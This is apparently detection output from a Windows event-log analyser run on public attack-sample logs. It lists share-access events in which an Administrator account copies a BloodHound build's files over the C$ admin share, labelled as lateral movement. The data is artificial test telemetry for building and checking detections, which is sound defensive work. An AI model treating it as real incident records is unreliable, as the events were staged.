2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\deferred : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\effects : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\event : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\exports : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\manipulation : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\queue : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\traversing : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\var : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\js-tokens : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jszip : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.798 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.gexf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.graphml : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.image : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.spreadsheet : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.svg : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.xlsx : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.helpers.graph : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.dagre : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceAtlas2 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceLink : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.fruchtermanReingold : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.noverlap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.cypher : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.gexf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.pathfinding.astar : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.activeState : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.animate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.colorbrewer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.design : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.dragNodes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.edgeSiblings : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.filter : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.fullScreen : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.generators : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.keyboard : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.lasso : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.leaflet : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.legend : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.locate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.neighborhoods : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.poweredBy : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.relativeSize : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.select : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.tooltips : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.customEdgeShapes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.edgeLabels : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.glyphs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.halo : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.linkurious : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.HITS : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
